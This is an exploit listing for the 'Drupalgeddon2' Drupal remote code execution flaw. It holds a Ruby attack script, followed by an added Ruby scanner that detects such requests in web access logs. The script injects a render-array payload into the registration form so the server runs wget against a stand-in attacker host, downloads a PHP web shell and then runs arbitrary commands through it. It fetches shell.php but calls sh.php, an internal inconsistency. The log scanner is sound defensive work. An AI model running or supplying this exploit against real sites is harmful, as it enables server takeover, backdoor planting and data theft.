Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execut
Source: vfocus.net Author: HansTopo Published: 2018-04-16
# EDB-Note. Have the contents of "shell" on http://attacker/shell.php

require 'net/http'

# Hans Topo ruby port from Drupalggedon2 exploit.
# Based on Vitalii Rudnykh exploit

target = ARGV[0]
command = ARGV[1]

url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'

shell = "<?php system($_GET['cmd']); ?>"

payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec'

uri = URI(url)

http = Net::HTTP.new(uri.host,uri.port)

if uri.scheme == 'https'
  http.use_ssl = true
  http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end

req = Net::HTTP::Post.new(uri.path)
req.body = payload

response = http.request(req)

if response.code != "200"
  puts "[*] Response: " + response.code
  puts "[*] Target seems not to be exploitable"
  exit
end

puts "[*] Target seems to be exploitable."

exploit_uri = URI(target+"/sh.php?cmd=#{command}")
response = Net::HTTP.get_response(exploit_uri)
puts response.body
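Added example, not part of the original listing: a Ruby scan of web access logs for the request shape built in the `url` variable above, where the `element_parents` query value names a `#`-prefixed render-array property on an AJAX form request. The log lines are constructed samples and the function names are this example's own; POST bodies do not appear in access logs, so only the query string is inspected, and flagging any path (not just `/user/register`) is a generalization beyond the listing.

```ruby
require 'uri'

# Request field of a combined-format access log line, plus the status code.
LOG_RE = %r{"(?<method>[A-Z]+) (?<target>\S+) HTTP/[\d.]+" (?<status>\d{3})}

# Percent-decode repeatedly (bounded) so %23value and %2523value both yield #value.
def deep_decode(value, rounds = 3)
  rounds.times do
    decoded = URI.decode_www_form_component(value)
    return decoded if decoded == value
    value = decoded
  end
  value
rescue ArgumentError
  value # malformed %-escape: keep whatever was decoded so far
end

# Split "path?query" into [path, {decoded name => decoded value}].
def parse_target(target)
  path, query = target.split('?', 2)
  params = (query || '').split('&').to_h do |pair|
    key, val = pair.split('=', 2)
    [deep_decode(key.to_s), deep_decode(val.to_s)]
  end
  [path, params]
end

# Flag AJAX form requests whose element_parents path contains a '#' segment.
# Form parent paths name form elements; '#'-prefixed keys are render-array properties.
def scan(lines)
  lines.each_with_index.filter_map do |line, idx|
    next unless (m = LOG_RE.match(line))
    path, params = parse_target(m[:target])
    parents = params['element_parents'].to_s
    property_ref = parents.split('/').any? { |seg| seg.start_with?('#') }
    ajax = params['ajax_form'] == '1' || params['_wrapper_format'] == 'drupal_ajax'
    next unless property_ref && ajax
    { line: idx + 1, method: m[:method], path: path,
      element_parents: parents, status: m[:status].to_i }
  end
end

# Constructed sample log lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
  '203.0.113.7 - - [16/Apr/2018:10:00:01 +0000] "GET /user/register HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [16/Apr/2018:10:00:05 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 512 "-" "Ruby"',
  '198.51.100.4 - - [16/Apr/2018:10:02:11 +0000] "POST /node/add/article?element_parents=field_image/widget/0&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 990 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [16/Apr/2018:10:03:40 +0000] "POST /user/register?element_parents=account/mail/%2523value&ajax_form=1 HTTP/1.1" 403 199 "-" "curl/7.58"'
].freeze
```

`scan(SAMPLE_LOG)` returns one hash per flagged line; the recorded status separates requests the server answered with 200 from ones it rejected, which is the first thing to triage on a host running a version named in the title.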